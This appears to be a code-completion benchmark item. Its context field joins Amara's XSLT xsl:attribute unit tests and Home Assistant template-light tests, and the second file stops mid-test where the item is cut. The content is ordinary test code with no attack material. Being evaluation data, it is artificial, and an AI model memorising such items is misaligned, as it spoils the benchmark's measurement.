gt stringclasses 1 value | context stringlengths 2.49k 119k |
|---|---|
########################################################################
# test/xslt/test_attribute.py
from amara.writers import WriterError, xmlwriter
from amara.xslt import XsltError
# %-template used to reconstruct the serializer's auto-generated namespace
# prefixes (filled with an integer counter, e.g. PREFIX_TEMPLATE % 0).
PREFIX_TEMPLATE = xmlwriter.xmlwriter.GENERATED_PREFIX
from xslt_support import _run_xml
# Minimal input document; these tests only exercise the transform output.
SOURCE_XML = """<?xml version="1.0"?><dummy/>"""
def test_attribute_1():
    """`xsl:attribute` as child of literal result element"""
    # The instruction must attach foo="bar" to the literal <result> element.
    transform = """<?xml version="1.0"?>
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0">
<xsl:template match='/'>
<result>
<xsl:attribute name="foo">bar</xsl:attribute>
</result>
</xsl:template>
</xsl:stylesheet>
"""
    expected = """<?xml version="1.0" encoding="UTF-8"?>
<result foo="bar"/>"""
    _run_xml(source_xml=SOURCE_XML,
             transform_xml=transform,
             expected=expected)
def test_attribute_2():
    """`xsl:attribute` as child of literal result element"""
    # NOTE(review): byte-for-byte duplicate of test_attribute_1; kept for
    # suite parity, but one of the two appears redundant.
    transform = """<?xml version="1.0"?>
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0">
<xsl:template match='/'>
<result>
<xsl:attribute name="foo">bar</xsl:attribute>
</result>
</xsl:template>
</xsl:stylesheet>
"""
    expected = """<?xml version="1.0" encoding="UTF-8"?>
<result foo="bar"/>"""
    _run_xml(source_xml=SOURCE_XML,
             transform_xml=transform,
             expected=expected)
def test_attribute_3():
    """`xsl:attribute` with namespace"""
    # An attribute with a namespace but no usable prefix gets a generated
    # one; the y: prefix from the QName is kept for the second attribute.
    generated = PREFIX_TEMPLATE % 0
    transform = """<?xml version="1.0"?>
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0">
<xsl:template match='/'>
<result>
<xsl:attribute name="foo" namespace="http://example.com/spam">bar</xsl:attribute>
<xsl:attribute name="y:foo" namespace="http://example.com/eggs">bar</xsl:attribute>
</result>
</xsl:template>
</xsl:stylesheet>
"""
    expected = ("""<?xml version="1.0" encoding="UTF-8"?>
<result xmlns:%(prefix0)s="http://example.com/spam" xmlns:y="http://example.com/eggs" %(prefix0)s:foo="bar" y:foo="bar"/>"""
                % {'prefix0': generated})
    _run_xml(source_xml=SOURCE_XML,
             transform_xml=transform,
             expected=expected)
def test_attribute_4():
    """adding attributes with the same expanded-name"""
    # Later xsl:attribute instructions replace earlier ones: "maz" wins.
    transform = """<?xml version="1.0"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="/">
<result>
<!-- duplicate attrs override previous -->
<xsl:attribute name="foo">bar</xsl:attribute>
<xsl:attribute name="foo">baz</xsl:attribute>
<xsl:attribute name="foo">maz</xsl:attribute>
</result>
</xsl:template>
</xsl:stylesheet>
"""
    expected = """<?xml version="1.0" encoding="UTF-8"?>
<result foo="maz"/>"""
    _run_xml(source_xml=SOURCE_XML,
             transform_xml=transform,
             expected=expected)
def test_attribute_5():
    """adding attributes with the same expanded-name"""
    # xsl:attribute overrides an attribute literally present on the element.
    transform = """<?xml version="1.0"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="/">
<result foo="bar">
<!-- duplicate attrs override previous -->
<xsl:attribute name="foo">baz</xsl:attribute>
</result>
</xsl:template>
</xsl:stylesheet>
"""
    expected = """<?xml version="1.0" encoding="UTF-8"?>
<result foo="baz"/>"""
    _run_xml(source_xml=SOURCE_XML,
             transform_xml=transform,
             expected=expected)
def test_attribute_6():
    """adding attributes with the same expanded-name"""
    # The override still applies when the second xsl:attribute is produced
    # indirectly (here via xsl:if) rather than as a direct sibling.
    transform = """<?xml version="1.0"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="/">
<result>
<xsl:attribute name="foo">bar</xsl:attribute>
<!-- duplicate attrs override previous -->
<!-- we use xsl:if to obscure it a bit -->
<xsl:if test="true()">
<xsl:attribute name="foo">baz</xsl:attribute>
</xsl:if>
</result>
</xsl:template>
</xsl:stylesheet>
"""
    expected = """<?xml version="1.0" encoding="UTF-8"?>
<result foo="baz"/>"""
    _run_xml(source_xml=SOURCE_XML,
             transform_xml=transform,
             expected=expected)
def test_attribute_7():
    """adding attributes with the same expanded-name"""
    # Both attributes share the expanded-name {http://some-ns/}foo, so the
    # second ("baz") wins even though the QNames/prefixes differ.
    # NOTE(review): the expected prefix is hard-coded here instead of using
    # PREFIX_TEMPLATE as the other tests do — verify they stay in sync.
    transform = """<?xml version="1.0"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="/">
<result>
<!-- duplicate attrs override previous -->
<xsl:attribute name="foo" namespace="http://some-ns/">bar</xsl:attribute>
<xsl:attribute name="x:foo" xmlns:x="http://some-ns/">baz</xsl:attribute>
</result>
</xsl:template>
</xsl:stylesheet>
"""
    expected = """<?xml version="1.0" encoding="UTF-8"?>
<result xmlns:org.4suite.4xslt.ns0="http://some-ns/" org.4suite.4xslt.ns0:foo="baz"/>"""
    _run_xml(source_xml=SOURCE_XML,
             transform_xml=transform,
             expected=expected)
def test_attribute_8():
    """adding attributes with the same expanded-name"""
    # xsl:attribute overrides a literal attribute that lives in the same
    # namespace; the in-scope prefix x is reused in the output.
    transform = """<?xml version="1.0"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="/">
<result x:foo="bar" xmlns:x="http://some-ns/">
<!-- duplicate attrs override previous -->
<xsl:attribute name="foo" namespace="http://some-ns/">baz</xsl:attribute>
</result>
</xsl:template>
</xsl:stylesheet>
"""
    expected = """<?xml version="1.0" encoding="UTF-8"?>
<result xmlns:x="http://some-ns/" x:foo="baz"/>"""
    _run_xml(source_xml=SOURCE_XML,
             transform_xml=transform,
             expected=expected)
def test_attribute_9():
    """serialization of linefeed in attribute value"""
    # NOTE(review): a linefeed in an attribute value should serialize as the
    # character reference '&#10;'; the literals below look like the entity
    # may have been lost in a copy/paste — verify against the original file.
    _run_xml(
        source_xml = SOURCE_XML,
        transform_xml = """<?xml version="1.0"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="/">
<result>
<!-- linefeed must be serialized as -->
<xsl:attribute name="a">x
y</xsl:attribute>
</result>
</xsl:template>
</xsl:stylesheet>
""",
        expected = """<?xml version="1.0" encoding="UTF-8"?>
<result a="x y"/>"""
        )
def test_attribute_10():
    """substitution of xmlns prefix in attribute name"""
    # A requested prefix of "xmlns" is illegal for a real attribute, so the
    # serializer must substitute a generated prefix instead.
    generated = PREFIX_TEMPLATE % 0
    transform = """<?xml version="1.0"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="/">
<result>
<!-- if an attribute prefix would be xmlns, it must be changed to something else -->
<xsl:attribute name="xmlns:foo" namespace="http://example.com/">bar</xsl:attribute>
</result>
</xsl:template>
</xsl:stylesheet>
"""
    expected = ("""<?xml version="1.0" encoding="UTF-8"?>
<result xmlns:%(prefix0)s="http://example.com/" %(prefix0)s:foo="bar"/>"""
                % {'prefix0': generated})
    _run_xml(source_xml=SOURCE_XML,
             transform_xml=transform,
             expected=expected)
def test_attribute_11():
    """attributes in various namespaces"""
    # Exercises every prefix-selection path at once: no namespace, explicit
    # empty namespace, generated prefix, preferred prefix from the QName,
    # and a namespace= that overrides the QName's prefix binding.
    _run_xml(
        source_xml = SOURCE_XML,
        transform_xml = """<?xml version="1.0"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="/">
<result>
<!-- correct results are indicated in the attribute values -->
<xsl:attribute name="foo">local-name foo, no namespace, no prefix</xsl:attribute>
<xsl:attribute name="in-empty-ns" namespace="">local-name in-empty-ns, no namespace, no prefix</xsl:attribute>
<xsl:attribute name="in-foo-ns" namespace="http://foo-ns/">local-name in-foo-ns, namespace http://foo-ns/, generated prefix</xsl:attribute>
<xsl:attribute name="pre:foo" xmlns:pre="http://ns-for-pre/">local-name foo, namespace http://ns-for-pre/, preferred prefix pre</xsl:attribute>
<xsl:attribute name="pre:bar" xmlns:pre="http://ns-for-pre/" namespace="http://explicit-ns/">local-name bar, namespace http://explicit-ns/, generated prefix</xsl:attribute>
</result>
</xsl:template>
</xsl:stylesheet>
""",
        # Two distinct generated prefixes are expected, numbered in order.
        expected = """<?xml version="1.0" encoding="UTF-8"?>
<result xmlns:pre="http://ns-for-pre/" xmlns:%(prefix0)s="http://foo-ns/" xmlns:%(prefix1)s="http://explicit-ns/" %(prefix1)s:bar="local-name bar, namespace http://explicit-ns/, generated prefix" foo="local-name foo, no namespace, no prefix" in-empty-ns="local-name in-empty-ns, no namespace, no prefix" pre:foo="local-name foo, namespace http://ns-for-pre/, preferred prefix pre" %(prefix0)s:in-foo-ns="local-name in-foo-ns, namespace http://foo-ns/, generated prefix"/>""" % {'prefix0': PREFIX_TEMPLATE % 0,
        'prefix1': PREFIX_TEMPLATE % 1}
        )
def test_attribute_12():
    """attributes in empty and in-scope default namespaces"""
    # A default namespace never applies to attributes, so in-foo-ns must get
    # an explicit (generated) prefix even though xmlns="http://foo-ns/" is
    # in scope on the element.
    _run_xml(
        source_xml = SOURCE_XML,
        transform_xml = """<?xml version="1.0"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="/">
<!-- the element should be in the http://foo-ns/ namespace. -->
<!-- the element *may*, but most likely won't, bear the same generated prefix as the in-foo-ns attribute. -->
<result xmlns="http://foo-ns/">
<!-- A default namespace is in scope, but this does not affect the value of 'name' in xsl:attribute. -->
<!-- in-foo-ns attribute does not inherit the default namespace. It *must* have a prefix, bound to http://foo-ns/ -->
<xsl:attribute name="foo">local-name foo, no namespace, no prefix</xsl:attribute>
<xsl:attribute name="in-empty-ns" namespace="">local-name in-empty-ns, no namespace, no prefix</xsl:attribute>
<xsl:attribute name="in-foo-ns" namespace="http://foo-ns/">local-name in-foo-ns, namespace http://foo-ns/, generated prefix</xsl:attribute>
</result>
</xsl:template>
</xsl:stylesheet>
""",
        expected = """<?xml version="1.0" encoding="UTF-8"?>
<result xmlns="http://foo-ns/" xmlns:%(prefix0)s="http://foo-ns/" foo="local-name foo, no namespace, no prefix" in-empty-ns="local-name in-empty-ns, no namespace, no prefix" %(prefix0)s:in-foo-ns="local-name in-foo-ns, namespace http://foo-ns/, generated prefix"/>""" % {
        'prefix0': PREFIX_TEMPLATE % 0}
        )
def test_attribute_13():
    """attributes in empty and in-scope non-default namespaces"""
    # The element's own foo: prefix binding should be reused for the
    # in-foo-ns attribute.  (A generated prefix would technically also be
    # conformant, but reusing foo is the better behavior.)
    transform = """<?xml version="1.0"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="/">
<!-- element should be in http://foo-ns/ namespace, retaining prefix foo -->
<foo:result xmlns:foo="http://foo-ns/">
<xsl:attribute name="foo">local-name foo, no namespace, no prefix</xsl:attribute>
<xsl:attribute name="in-empty-ns" namespace="">local-name in-empty-ns, no namespace, no prefix</xsl:attribute>
<xsl:attribute name="in-foo-ns" namespace="http://foo-ns/">local-name in-foo-ns, namespace http://foo-ns/, prefix foo</xsl:attribute>
</foo:result>
</xsl:template>
</xsl:stylesheet>
"""
    expected = """<?xml version="1.0" encoding="UTF-8"?>
<foo:result xmlns:foo="http://foo-ns/" foo="local-name foo, no namespace, no prefix" in-empty-ns="local-name in-empty-ns, no namespace, no prefix" foo:in-foo-ns="local-name in-foo-ns, namespace http://foo-ns/, prefix foo"/>"""
    _run_xml(source_xml=SOURCE_XML,
             transform_xml=transform,
             expected=expected)
def test_attribute_14():
    """attributes using in-scope namespaces and duplicate prefixes"""
    # in-foo-ns should reuse the element's pre: binding; bar's QName prefix
    # is overridden by namespace=, so it must get a generated prefix.
    _run_xml(
        source_xml = SOURCE_XML,
        transform_xml = """<?xml version="1.0"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="/">
<!-- element should be in http://foo-ns/ namespace, retaining prefix foo -->
<pre:result xmlns:pre="http://foo-ns/">
<xsl:attribute name="in-foo-ns" namespace="http://foo-ns/">local-name in-foo-ns, namespace http://foo-ns/, prefix pre</xsl:attribute>
<xsl:attribute name="pre:bar" xmlns:pre="http://ns-for-pre/" namespace="http://explicit-ns/">local-name bar, namespace http://explicit-ns/, generated prefix</xsl:attribute>
</pre:result>
</xsl:template>
</xsl:stylesheet>
""",
        # the bar attribute must have a generated prefix.
        # it's technically OK for the in-foo-ns attr to have a
        # generated prefix, but it really should re-use the pre.
        expected = """<?xml version="1.0" encoding="UTF-8"?>
<pre:result xmlns:pre="http://foo-ns/" xmlns:%(prefix0)s="http://explicit-ns/" pre:in-foo-ns="local-name in-foo-ns, namespace http://foo-ns/, prefix pre" %(prefix0)s:bar="local-name bar, namespace http://explicit-ns/, generated prefix"/>""" % {'prefix0': PREFIX_TEMPLATE % 0}
        )
def test_attribute_error_1():
    """adding attribute after non-attributes"""
    # Text output precedes the xsl:attribute, so the writer must reject the
    # late attribute with ATTRIBUTE_ADDED_TOO_LATE.
    try:
        _run_xml(
            # Use the shared SOURCE_XML constant for consistency with the
            # non-error tests (same literal value).
            source_xml = SOURCE_XML,
            transform_xml = """<?xml version="1.0"?>
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0">
<xsl:template match='/'>
<result>
<xsl:text>Hello World</xsl:text>
<xsl:attribute name="foo">bar</xsl:attribute>
</result>
</xsl:template>
</xsl:stylesheet>
""",
            expected = None)
    # 'except X as err' replaces the Python-2-only 'except X, err' form.
    except WriterError as err:
        assert err.code == WriterError.ATTRIBUTE_ADDED_TOO_LATE
    else:
        raise AssertionError("should have failed!")
def test_attribute_error_2():
    """adding attribute to non-element"""
    # The attribute has no element parent (template writes it at the root),
    # which must raise ATTRIBUTE_ADDED_TO_NON_ELEMENT.
    try:
        _run_xml(
            source_xml = SOURCE_XML,
            transform_xml = """<?xml version="1.0"?>
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0">
<xsl:template match='/'>
<xsl:attribute name="foo">bar</xsl:attribute>
</xsl:template>
</xsl:stylesheet>
""",
            expected = None)
    # 'except X as err' replaces the Python-2-only 'except X, err' form.
    except WriterError as err:
        assert err.code == WriterError.ATTRIBUTE_ADDED_TO_NON_ELEMENT
    else:
        raise AssertionError("should have failed!")
def test_attribute_error_3():
    """creating non-text during xsl:attribute instantiation"""
    # Only text may be produced inside xsl:attribute; a comment child must
    # raise NONTEXT_IN_ATTRIBUTE.
    try:
        _run_xml(
            source_xml = SOURCE_XML,
            transform_xml = """<?xml version="1.0"?>
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0">
<xsl:template match='/'>
<xsl:attribute name="foo">
<xsl:comment>no-no</xsl:comment>
</xsl:attribute>
</xsl:template>
</xsl:stylesheet>
""",
            expected = None)
    # 'except X as err' replaces the Python-2-only 'except X, err' form.
    except XsltError as err:
        assert err.code == XsltError.NONTEXT_IN_ATTRIBUTE
    else:
        raise AssertionError("should have failed!")
def test_attribute_error_4():
    """illegal attribute name ("xmlns")"""
    # The reserved name "xmlns" cannot be created via xsl:attribute.
    try:
        _run_xml(
            source_xml = SOURCE_XML,
            transform_xml = """<?xml version="1.0"?>
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0">
<xsl:template match='/'>
<result>
<xsl:attribute name="xmlns">http://example.com/</xsl:attribute>
</result>
</xsl:template>
</xsl:stylesheet>
""",
            expected = None)
    # 'except X as err' replaces the Python-2-only 'except X, err' form.
    except XsltError as err:
        assert err.code == XsltError.BAD_ATTRIBUTE_NAME
    else:
        raise AssertionError("should have failed!")
def test_attribute_error_5():
    """illegal attribute name (non-QName)"""
    # "#invalid" is not a QName, so instantiation must fail.
    try:
        _run_xml(
            source_xml = SOURCE_XML,
            transform_xml = """<?xml version="1.0"?>
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0">
<xsl:template match='/'>
<result>
<xsl:attribute name="#invalid">bar</xsl:attribute>
</result>
</xsl:template>
</xsl:stylesheet>
""",
            expected = None)
    # 'except X as err' replaces the Python-2-only 'except X, err' form.
    except XsltError as err:
        assert err.code == XsltError.INVALID_QNAME_ATTR
    else:
        raise AssertionError("should have failed!")
def test_attribute_error_6():
    """illegal namespace-uri"""
    # The reserved XML and xmlns namespace URIs may not be targeted.
    try:
        _run_xml(
            source_xml = SOURCE_XML,
            transform_xml = """<?xml version="1.0"?>
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0">
<xsl:template match='/'>
<result>
<xsl:attribute name="foo" namespace="http://www.w3.org/XML/1998/namespace">bar</xsl:attribute>
<xsl:attribute name="spam" namespace="http://www.w3.org/2000/xmlns/">eggs</xsl:attribute>
</result>
</xsl:template>
</xsl:stylesheet>
""",
            expected = None)
    # 'except X as err' replaces the Python-2-only 'except X, err' form.
    except XsltError as err:
        assert err.code == XsltError.INVALID_NS_URIREF_ATTR
    else:
        raise AssertionError("should have failed!")
# Running this module directly is unsupported; the suite is nose-driven.
if __name__ == '__main__':
    raise SystemExit("use nosetests")
| |
"""The tests for the Template light platform."""
import logging
from homeassistant.core import callback
from homeassistant import setup
from homeassistant.components.light import ATTR_BRIGHTNESS
from homeassistant.const import STATE_ON, STATE_OFF
from tests.common import (
get_test_home_assistant, assert_setup_component)
from tests.components.light import common
_LOGGER = logging.getLogger(__name__)
class TestTemplateLight:
    """Test the Template light."""

    # Assigned fresh in setup_method for every test; class-level defaults
    # only exist so the attributes are always defined.
    hass = None
    calls = None

    # pylint: disable=invalid-name
    def setup_method(self, method):
        """Set up things to be run when tests are started."""
        self.hass = get_test_home_assistant()
        self.calls = []

        @callback
        def record_call(service):
            """Track function calls.."""
            self.calls.append(service)

        # Tests that point an action at 'test.automation' are recorded here.
        self.hass.services.register('test', 'automation', record_call)

    def teardown_method(self, method):
        """Stop everything that was started."""
        self.hass.stop()
    def test_template_state_text(self):
        """Test the state text of a template."""
        with assert_setup_component(1, 'light'):
            assert setup.setup_component(self.hass, 'light', {
                'light': {
                    'platform': 'template',
                    'lights': {
                        'test_template_light': {
                            'value_template':
                                "{{ states.light.test_state.state }}",
                            'turn_on': {
                                'service': 'light.turn_on',
                                'entity_id': 'light.test_state'
                            },
                            'turn_off': {
                                'service': 'light.turn_off',
                                'entity_id': 'light.test_state'
                            },
                            'set_level': {
                                'service': 'light.turn_on',
                                'data_template': {
                                    'entity_id': 'light.test_state',
                                    'brightness': '{{brightness}}'
                                }
                            }
                        }
                    }
                }
            })

        self.hass.start()
        self.hass.block_till_done()

        # The template light must mirror the source entity's state.
        # NOTE(review): states.set returns None; these assignments to
        # 'state' are immediately overwritten and could be dropped.
        state = self.hass.states.set('light.test_state', STATE_ON)
        self.hass.block_till_done()

        state = self.hass.states.get('light.test_template_light')
        assert state.state == STATE_ON

        state = self.hass.states.set('light.test_state', STATE_OFF)
        self.hass.block_till_done()

        state = self.hass.states.get('light.test_template_light')
        assert state.state == STATE_OFF
    def test_template_state_boolean_on(self):
        """Test the setting of the state with boolean on."""
        # A template evaluating to a truthy boolean yields STATE_ON.
        with assert_setup_component(1, 'light'):
            assert setup.setup_component(self.hass, 'light', {
                'light': {
                    'platform': 'template',
                    'lights': {
                        'test_template_light': {
                            'value_template': "{{ 1 == 1 }}",
                            'turn_on': {
                                'service': 'light.turn_on',
                                'entity_id': 'light.test_state'
                            },
                            'turn_off': {
                                'service': 'light.turn_off',
                                'entity_id': 'light.test_state'
                            },
                            'set_level': {
                                'service': 'light.turn_on',
                                'data_template': {
                                    'entity_id': 'light.test_state',
                                    'brightness': '{{brightness}}'
                                }
                            }
                        }
                    }
                }
            })

        self.hass.start()
        self.hass.block_till_done()

        state = self.hass.states.get('light.test_template_light')
        assert state.state == STATE_ON
    def test_template_state_boolean_off(self):
        """Test the setting of the state with off."""
        # A template evaluating to a falsy boolean yields STATE_OFF.
        with assert_setup_component(1, 'light'):
            assert setup.setup_component(self.hass, 'light', {
                'light': {
                    'platform': 'template',
                    'lights': {
                        'test_template_light': {
                            'value_template': "{{ 1 == 2 }}",
                            'turn_on': {
                                'service': 'light.turn_on',
                                'entity_id': 'light.test_state'
                            },
                            'turn_off': {
                                'service': 'light.turn_off',
                                'entity_id': 'light.test_state'
                            },
                            'set_level': {
                                'service': 'light.turn_on',
                                'data_template': {
                                    'entity_id': 'light.test_state',
                                    'brightness': '{{brightness}}'
                                }
                            }
                        }
                    }
                }
            })

        self.hass.start()
        self.hass.block_till_done()

        state = self.hass.states.get('light.test_template_light')
        assert state.state == STATE_OFF
    def test_template_syntax_error(self):
        """Test templating syntax error."""
        # An unterminated Jinja block must abort setup: 0 platforms loaded
        # and no entities created.
        with assert_setup_component(0, 'light'):
            assert setup.setup_component(self.hass, 'light', {
                'light': {
                    'platform': 'template',
                    'lights': {
                        'test_template_light': {
                            'value_template': "{%- if false -%}",
                            'turn_on': {
                                'service': 'light.turn_on',
                                'entity_id': 'light.test_state'
                            },
                            'turn_off': {
                                'service': 'light.turn_off',
                                'entity_id': 'light.test_state'
                            },
                            'set_level': {
                                'service': 'light.turn_on',
                                'data_template': {
                                    'entity_id': 'light.test_state',
                                    'brightness': '{{brightness}}'
                                }
                            }
                        }
                    }
                }
            })

        self.hass.start()
        self.hass.block_till_done()

        assert self.hass.states.all() == []
    def test_invalid_name_does_not_create(self):
        """Test invalid name."""
        # 'bad name here' is not a valid object id (contains spaces), so
        # setup must fail and create no entities.
        with assert_setup_component(0, 'light'):
            assert setup.setup_component(self.hass, 'light', {
                'light': {
                    'platform': 'template',
                    'lights': {
                        'bad name here': {
                            'value_template': "{{ 1== 1}}",
                            'turn_on': {
                                'service': 'light.turn_on',
                                'entity_id': 'light.test_state'
                            },
                            'turn_off': {
                                'service': 'light.turn_off',
                                'entity_id': 'light.test_state'
                            },
                            'set_level': {
                                'service': 'light.turn_on',
                                'data_template': {
                                    'entity_id': 'light.test_state',
                                    'brightness': '{{brightness}}'
                                }
                            }
                        }
                    }
                }
            })

        self.hass.start()
        self.hass.block_till_done()

        assert self.hass.states.all() == []
def test_invalid_light_does_not_create(self):
"""Test invalid light."""
with assert_setup_component(0, 'light'):
assert setup.setup_component(self.hass, 'light', {
'light': {
'platform': 'template',
'switches': {
'test_template_light': 'Invalid'
}
}
})
self.hass.start()
self.hass.block_till_done()
assert self.hass.states.all() == []
def test_no_lights_does_not_create(self):
"""Test if there are no lights no creation."""
with assert_setup_component(0, 'light'):
assert setup.setup_component(self.hass, 'light', {
'light': {
'platform': 'template'
}
})
self.hass.start()
self.hass.block_till_done()
assert self.hass.states.all() == []
    def test_missing_template_does_create(self):
        """Test missing template."""
        # value_template is optional: without it the light is optimistic
        # and the entity is still created.
        with assert_setup_component(1, 'light'):
            assert setup.setup_component(self.hass, 'light', {
                'light': {
                    'platform': 'template',
                    'lights': {
                        'light_one': {
                            'turn_on': {
                                'service': 'light.turn_on',
                                'entity_id': 'light.test_state'
                            },
                            'turn_off': {
                                'service': 'light.turn_off',
                                'entity_id': 'light.test_state'
                            },
                            'set_level': {
                                'service': 'light.turn_on',
                                'data_template': {
                                    'entity_id': 'light.test_state',
                                    'brightness': '{{brightness}}'
                                }
                            }
                        }
                    }
                }
            })

        self.hass.start()
        self.hass.block_till_done()

        assert self.hass.states.all() != []
def test_missing_on_does_not_create(self):
"""Test missing on."""
with assert_setup_component(0, 'light'):
assert setup.setup_component(self.hass, 'light', {
'light': {
'platform': 'template',
'lights': {
'bad name here': {
'value_template': "{{ 1== 1}}",
'turn_off': {
'service': 'light.turn_off',
'entity_id': 'light.test_state'
},
'set_level': {
'service': 'light.turn_on',
'data_template': {
'entity_id': 'light.test_state',
'brightness': '{{brightness}}'
}
}
}
}
}
})
self.hass.start()
self.hass.block_till_done()
assert self.hass.states.all() == []
def test_missing_off_does_not_create(self):
"""Test missing off."""
with assert_setup_component(0, 'light'):
assert setup.setup_component(self.hass, 'light', {
'light': {
'platform': 'template',
'lights': {
'bad name here': {
'value_template': "{{ 1== 1}}",
'turn_on': {
'service': 'light.turn_on',
'entity_id': 'light.test_state'
},
'set_level': {
'service': 'light.turn_on',
'data_template': {
'entity_id': 'light.test_state',
'brightness': '{{brightness}}'
}
}
}
}
}
})
self.hass.start()
self.hass.block_till_done()
assert self.hass.states.all() == []
    def test_on_action(self):
        """Test on action."""
        # turn_on is routed to the recorded 'test.automation' service.
        assert setup.setup_component(self.hass, 'light', {
            'light': {
                'platform': 'template',
                'lights': {
                    'test_template_light': {
                        'value_template': "{{states.light.test_state.state}}",
                        'turn_on': {
                            'service': 'test.automation',
                        },
                        'turn_off': {
                            'service': 'light.turn_off',
                            'entity_id': 'light.test_state'
                        },
                        'set_level': {
                            'service': 'light.turn_on',
                            'data_template': {
                                'entity_id': 'light.test_state',
                                'brightness': '{{brightness}}'
                            }
                        }
                    }
                }
            }
        })

        self.hass.start()
        self.hass.block_till_done()

        self.hass.states.set('light.test_state', STATE_OFF)
        self.hass.block_till_done()

        state = self.hass.states.get('light.test_template_light')
        assert state.state == STATE_OFF

        common.turn_on(self.hass, 'light.test_template_light')
        self.hass.block_till_done()

        # Exactly one service call must have been recorded.
        assert len(self.calls) == 1
    def test_on_action_optimistic(self):
        """Test on action with optimistic state."""
        # No value_template: the light assumes (optimistically) that
        # turn_on succeeded and reports STATE_ON itself.
        assert setup.setup_component(self.hass, 'light', {
            'light': {
                'platform': 'template',
                'lights': {
                    'test_template_light': {
                        'turn_on': {
                            'service': 'test.automation',
                        },
                        'turn_off': {
                            'service': 'light.turn_off',
                            'entity_id': 'light.test_state'
                        },
                        'set_level': {
                            'service': 'light.turn_on',
                            'data_template': {
                                'entity_id': 'light.test_state',
                                'brightness': '{{brightness}}'
                            }
                        }
                    }
                }
            }
        })

        self.hass.start()
        self.hass.block_till_done()

        self.hass.states.set('light.test_state', STATE_OFF)
        self.hass.block_till_done()

        state = self.hass.states.get('light.test_template_light')
        assert state.state == STATE_OFF

        common.turn_on(self.hass, 'light.test_template_light')
        self.hass.block_till_done()

        state = self.hass.states.get('light.test_template_light')
        assert len(self.calls) == 1
        assert state.state == STATE_ON
    def test_off_action(self):
        """Test off action."""
        # turn_off is routed to the recorded 'test.automation' service.
        assert setup.setup_component(self.hass, 'light', {
            'light': {
                'platform': 'template',
                'lights': {
                    'test_template_light': {
                        'value_template': "{{states.light.test_state.state}}",
                        'turn_on': {
                            'service': 'light.turn_on',
                            'entity_id': 'light.test_state'
                        },
                        'turn_off': {
                            'service': 'test.automation',
                        },
                        'set_level': {
                            'service': 'light.turn_on',
                            'data_template': {
                                'entity_id': 'light.test_state',
                                'brightness': '{{brightness}}'
                            }
                        }
                    }
                }
            }
        })

        self.hass.start()
        self.hass.block_till_done()

        self.hass.states.set('light.test_state', STATE_ON)
        self.hass.block_till_done()

        state = self.hass.states.get('light.test_template_light')
        assert state.state == STATE_ON

        common.turn_off(self.hass, 'light.test_template_light')
        self.hass.block_till_done()

        assert len(self.calls) == 1
    def test_off_action_optimistic(self):
        """Test off action with optimistic state."""
        # No value_template: state stays what the light last assumed.
        assert setup.setup_component(self.hass, 'light', {
            'light': {
                'platform': 'template',
                'lights': {
                    'test_template_light': {
                        'turn_on': {
                            'service': 'light.turn_on',
                            'entity_id': 'light.test_state'
                        },
                        'turn_off': {
                            'service': 'test.automation',
                        },
                        'set_level': {
                            'service': 'light.turn_on',
                            'data_template': {
                                'entity_id': 'light.test_state',
                                'brightness': '{{brightness}}'
                            }
                        }
                    }
                }
            }
        })

        self.hass.start()
        self.hass.block_till_done()

        state = self.hass.states.get('light.test_template_light')
        assert state.state == STATE_OFF

        common.turn_off(self.hass, 'light.test_template_light')
        self.hass.block_till_done()

        assert len(self.calls) == 1
        state = self.hass.states.get('light.test_template_light')
        assert state.state == STATE_OFF
    def test_level_action_no_template(self):
        """Test setting brightness with optimistic template."""
        assert setup.setup_component(self.hass, 'light', {
            'light': {
                'platform': 'template',
                'lights': {
                    'test_template_light': {
                        'value_template': '{{1 == 1}}',
                        'turn_on': {
                            'service': 'light.turn_on',
                            'entity_id': 'light.test_state'
                        },
                        'turn_off': {
                            'service': 'light.turn_off',
                            'entity_id': 'light.test_state'
                        },
                        'set_level': {
                            'service': 'test.automation',
                            'data_template': {
                                'entity_id': 'test.test_state',
                                'brightness': '{{brightness}}'
                            }
                        },
                    }
                }
            }
        })
        self.hass.start()
        self.hass.block_till_done()

        state = self.hass.states.get('light.test_template_light')
        assert state.attributes.get('brightness') is None

        common.turn_on(
            self.hass, 'light.test_template_light', **{ATTR_BRIGHTNESS: 124})
        self.hass.block_till_done()
        assert len(self.calls) == 1
        # data_template renders to a string, hence '124' in the call data,
        # while the entity attribute keeps the numeric value.
        assert self.calls[0].data['brightness'] == '124'

        state = self.hass.states.get('light.test_template_light')
        _LOGGER.info(str(state.attributes))
        assert state is not None
        assert state.attributes.get('brightness') == 124
    def test_level_template(self):
        """Test the template for the level."""
        # level_template drives the reported brightness attribute.
        with assert_setup_component(1, 'light'):
            assert setup.setup_component(self.hass, 'light', {
                'light': {
                    'platform': 'template',
                    'lights': {
                        'test_template_light': {
